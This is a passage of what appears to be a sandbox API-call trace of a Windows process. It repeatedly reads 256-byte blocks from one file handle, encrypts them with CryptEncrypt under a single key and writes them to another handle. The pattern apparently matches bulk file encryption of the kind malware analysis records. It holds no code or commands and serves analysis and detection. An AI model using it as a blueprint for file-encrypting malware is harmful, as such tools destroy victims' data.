pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.594] GetLastError () returned 0x0 [0165.594] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.594] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.594] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.594] GetLastError () returned 0x0 [0165.594] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.594] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.594] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.594] GetLastError () returned 0x0 [0165.594] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.594] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.594] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.594] GetLastError () returned 0x0 [0165.594] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.594] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.594] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.594] GetLastError () returned 0x0 [0165.594] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.594] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.594] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.594] GetLastError () returned 0x0 [0165.595] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.595] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.595] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.595] GetLastError () returned 0x0 [0165.595] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.595] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.595] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.595] GetLastError () returned 0x0 [0165.595] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.595] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.595] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.595] GetLastError () returned 0x0 [0165.595] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.595] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.595] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.595] GetLastError () returned 0x0 [0165.595] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.595] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.595] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.595] GetLastError () returned 0x0 [0165.595] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.595] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.595] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.595] GetLastError () returned 0x0 [0165.595] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.595] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.596] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.596] GetLastError () returned 0x0 [0165.596] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.596] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.596] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.596] GetLastError () returned 0x0 [0165.596] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.596] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.596] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.596] GetLastError () returned 0x0 [0165.596] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.596] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.596] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.596] GetLastError () returned 0x0 [0165.596] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.596] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.596] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.596] GetLastError () returned 0x0 [0165.596] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.596] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.596] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.596] GetLastError () returned 0x0 [0165.596] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.596] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.597] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.597] GetLastError () returned 0x0 [0165.597] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.597] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.597] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.597] GetLastError () returned 0x0 [0165.597] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.597] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.597] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.597] GetLastError () returned 0x0 [0165.597] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.597] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.597] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.597] GetLastError () returned 0x0 [0165.597] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.597] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.597] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.597] GetLastError () returned 0x0 [0165.597] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.597] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.597] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.597] GetLastError () returned 0x0 [0165.597] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.597] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.597] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.597] GetLastError () returned 0x0 [0165.597] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.598] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.598] GetLastError () returned 0x0 [0165.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.598] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.598] GetLastError () returned 0x0 [0165.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.598] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.598] GetLastError () returned 0x0 [0165.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.598] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.598] GetLastError () returned 0x0 [0165.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.598] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.598] GetLastError () returned 0x0 [0165.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.598] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.598] GetLastError () returned 0x0 [0165.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.599] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.599] GetLastError () returned 0x0 [0165.599] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.599] CryptEncrypt (in: 